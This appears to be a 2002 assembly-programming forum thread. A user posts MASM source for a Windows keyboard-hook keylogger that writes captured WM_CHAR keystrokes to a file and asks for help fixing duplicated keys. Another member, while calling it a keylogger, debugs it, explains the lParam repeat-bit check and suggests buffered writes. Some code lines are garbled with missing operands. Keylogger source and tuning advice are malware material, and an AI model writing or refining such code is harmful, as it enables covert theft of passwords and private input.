Sorry for bad code :)). Its written for about hour, but I'm encounter such a problem - on some apps keys entered are duplicated, I'm stuck on this, besides it is hard to debug in sice. Please, help, where is my problem

KeyProc proc nCode:DWORD,wParam:DWORD,lParam:DWORD
invoke CallNextHookEx, hHook, nCode, wParam, lParam
.IF nCode >= 0
mov edx, lParam
ASSUME edx: ptr MSG
.IF (.message == WM_CHAR)

mov eax, .wParam
mov edi, offset strng
add edi,
stosb
inc

call write ;write it immidiately in file
mov edi, offset strng
mov ecx, 4096
call clrbuf ;clear up buffer - for future use
xor eax, eax
mov , eax
ASSUME edx: NOTHING
.ENDIF
lParam
.ENDIF
ret
KeyProc endp
Posted on 2002-01-23 04:35:45 by masquer
Mmmmh, a keylogger.... against my better judgement i will assume that you have a valid reason for writing it...

You have several problems with this code:

mov edi, offset strng
mov ecx, 4096
call clrbuf ;clear up buffer - for future use
You clear the buffer every time you come through this message handler????!!! No comment needed here!

ASSUME edx: NOTHING
.ENDIF
To be technically correct, this 'ASSUME edx : nothing' should be outside the .ENDIF, that way it matches the original ASSUME.

lParam
.ENDIF
This 'lParam' looks awful lonely sitting here by itself, what is it doing?

Your biggest mistake is that you are not checking bit30 of lParam to see if this is a repeat message; it is possible for several WM_CHAR messages to get sent for each single keypress.
Posted on 2002-01-23 05:47:59 by sluggy
Thank you very much, that's it.

Now some explanation about buffer clearing. My plan was to fill this buffer till the end and then write it to file, that's why this code in here.
lParam - is kinda mistake here :)))

And again thanks a lot for pointing me the right door
Posted on 2002-01-23 08:43:41 by masquer
Originally posted by masquer My plan was to fill this buffer till the end and then write it to file, that's why this code in here.

No problems :).

With your buffer clearing, leave your call where it is, just test the size of strl first. I would suggest you write the whole buffer to file at once, rather than one character at a time, that will speed it up a lot.
Posted on 2002-01-23 15:02:41 by sluggy
Subj, sluggy, thanks again.
Now i have one more question:
mov eax, lParam
what's the difference here between
test eax, 80000000h
and
and eax, 80000000h ;I know this is right :)
OK, we clear bit31, and what. I mean what this mean for my hook and target application.
And finally
xor eax, eax

Is there another technique of processing the keystrokes entered?
Url's, etc is accepted.
Posted on 2002-01-24 01:59:05 by masquer